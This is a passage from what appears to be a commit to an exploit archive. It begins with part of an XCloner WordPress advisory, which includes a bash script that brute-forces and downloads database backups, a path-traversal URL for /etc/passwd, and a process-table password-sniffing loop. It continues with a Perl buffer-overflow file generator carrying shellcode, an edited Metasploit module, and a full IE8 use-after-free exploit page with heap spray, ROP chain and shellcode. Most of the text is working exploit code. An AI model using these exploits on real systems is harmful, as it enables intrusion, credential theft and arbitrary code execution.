1355 } else {
1356
1357 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-nodrop' . $f_ext;
1358 }
1359 } else
1360 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-nosql' . $f_ext;
1361 } else {
Screenshots available at the advisory URL above.
Ive found a few vulnerable websites with the google dork:
https://www.google.com/#q=inurl:+administrator%2Fbackups
A PoC:
lwc@wordpress:~$ bash exp.sh 192.168.0.26
[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:51-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-27_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 56.9M/s in 0.7s
2014-10-30 13:02:52 (56.9 MB/s) - `backup_2014-10-30_06-27_-sql-nodrop.tar.1' saved [44400640/44400640]
[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:52-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-33_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 64.1M/s in 0.7s
2014-10-30 13:02:53 (64.1 MB/s) - `backup_2014-10-30_06-33_-sql-nodrop.tar.1' saved [44400640/44400640]
#!/bin/bash
#Exploit to download XCloner v3.1.1 Database backups OSVDB: 114177
#Larry W. Cashdollar, @_larry0
#XCloner recommends a backup storage path under the WP root directory
#it uses a 0 size index.html file to block indexing.
#we can try to brute force the filenames it creates.
MONTH=10
DAY=30
#May need to set the DOMAIN to $1 the target depending on how WP is configured.
DOMAIN=
for y in `seq -w 1 24`; do
for x in `seq -w 1 59`; do
CPATH="http://$1/administrator/backups/backup_2014-"$MONTH"-"$DAY"_"$y"-"$x"_$DOMAIN-sql-nodrop.tar";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo "Downloading......";
wget $CPATH
fi;
done
done
Remote File Access
The user has to have administrative rights, but the backup downloader doesnt check the path
for ../.
http://192.168.0.33/wp-admin/admin-ajax.php?action=json_return&page=xcloner_show&option=com_cloner&task=download&file=../../../../etc/passwd
Will download /etc/passwd off the remote system.
MySQL Database Password Exposed to Process Table
Local users can steal the MySQL password by watching the process table:
lwc@wordpress:/etc/wordpress$ while (true); do ps -ef |grep [m]ysqldump; done
www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -pPASSWORDHERE wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords
www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords
www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -ps3cur1ty wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords
www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords
^C

60
platforms/windows/dos/35105.pl Executable file
View file

@ -0,0 +1,60 @@
#EDB Note: DoS - b0f isn't working.
# Title : Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) Buffer Overflow
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Date : 28.10.2014
# Python : V 2.7
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
my $file = "exploit.wax"; #dont change file name if change file name you must change $filepath
my $junk = "\x41" x 43516;
my $eip = "\xC3\x9c\xC8\x75"; #75C89CC3 JMP ESP | bad char: \x09\x0a
my $oyala = "\x90" x 100;
#tested on my windows 7 ultimate for file name "exploit.wax" if its not true path your windows you can change it for you
my $filepath = "\x01\x00\x00\x00\x00\x00\x00\x00". # .......
"\xCA\x84\xB2\x75\x4C\x00\x31\x00". # Ê„²uD.2.
"\x22\x00\x00\x00\x43\x3A\x5C\x55". # "...C:\U
"\x73\x65\x72\x73\x5C\x61\x64\x6D". # sers\adm
"\x69\x6E\x5C\x44\x65\x73\x6B\x74". # in\Deskt
"\x6F\x70\x5C\x65\x78\x70\x6C\x6F". # op\explo
"\x69\x74\x2E\x77\x61\x78\x00\x00"; # it.wax..
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ruby msfencode -e x86/alpha_upper -t c
my $shellcode = "\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34".
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41".
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58".
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30".
"\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52".
"\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b".
"\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50".
"\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c".
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54".
"\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b".
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c".
"\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31".
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47".
"\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54".
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e".
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30".
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51".
"\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51".
"\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45".
"\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50".
"\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56".
"\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a".
"\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c".
"\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38".
"\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b".
"\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d".
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d".
"\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53".
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43".
"\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35".
"\x45\x50\x41\x41";
open ($FILE, ">$file");
print $FILE "$junk.$eip.$oyala.$shellcode.$filepath";
close ($FILE);

9
platforms/windows/local/35101.rb
View file

@ -32,7 +32,8 @@ class Metasploit3 < Msf::Exploit::Local
[ [
'Unknown', # vulnerability discovery and exploit in the wild 'Unknown', # vulnerability discovery and exploit in the wild
'juan vazquez', # msf module (x86 target) 'juan vazquez', # msf module (x86 target)
'Spencer McIntyre' # msf module (x64 target) 'Spencer McIntyre', # msf module (x64 target)
'OJ Reeves <oj[at]buffered.io>'
], ],
'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => 'win', 'Platform' => 'win',
@ -93,11 +94,7 @@ class Metasploit3 < Msf::Exploit::Local
return Exploit::CheckCode::Safe if build == 9200 return Exploit::CheckCode::Safe if build == 9200
return Exploit::CheckCode::Safe if build == 9600 return Exploit::CheckCode::Safe if build == 9600
if arch == ARCH_X86 return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
else
return Exploit::CheckCode::Detected if build == 7601
end
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end

149
platforms/windows/remote/35213.html Executable file
View file

@ -0,0 +1,149 @@
<!--
Exploit Title: MS14-035 Use-after-free Exploit for IE8
Date: 10 Nov 2014
Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy
Tested on: IE8 with Java6 on Windows7
-->
<html>
<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>
<body>
<!--
<APPLET id="dummy" code="dummy.class" width=100 height=100>
You need to install Java to view this page.
</APPLET>
-->
<div id="mydiv">x</div>
<form id="frm"></form>
<div id="sprayfrm"></div>
<script type="text/javascript">
spraysize = 5000;
sprayelement = document.getElementById("sprayfrm");
sprayelement.style.cssText = "display:none";
var data;
offset = 0x506;
buffer = unescape("%u2020%u2020");
pivot = unescape("%u8b05%u7c34"); // stack pivot
// MSVCR71
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010
// calc
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163");
/*
_______0x1cc_____
| |
\|/ |
Junk ROP Shellcode Pivot Junk
2 3 1
*/
while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
buffer += rop;
buffer += shellcode;
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
while (buffer.length < 0x1000) buffer += buffer;
data = buffer.substring(0,offset) + pivot + rop + shellcode
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);
//obj.style.fontFamily = data.substring(0,0x40000-0x58);
sprayelement.appendChild(obj);
}
block = unescape( // Literal string to avoid heap allocation
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");
blocks = new Array();
for (i = 0; i < spraysize; i++) { // spray 1
blocks.push(document.createElement("button"));
blocks[i].setAttribute("title",block.substring(0, block.length));
sprayelement.appendChild(blocks[i]);
}
for (i = spraysize/2; i < spraysize; i++) { // free some blocks
blocks[i].setAttribute("title","");
}
var newdiv = document.createElement('div');
newdiv.innerHTML = "<textarea id='CTextArea'>&lt;/textarea&gt;";
document.getElementById("frm").appendChild(newdiv);
var newdiv2 = document.createElement('div');
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
document.getElementById("frm").appendChild(newdiv2);
document.getElementById("CInput").checked = true;
trigger = true;
document.getElementById("frm").reset();
function crash() {
if (trigger) {
document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
CollectGarbage();
for (i = spraysize/2; i < spraysize; i++) { // spray 2
blocks[i].setAttribute("title",block.substring(0, block.length));
}
}
}
</script>
</body>
</html>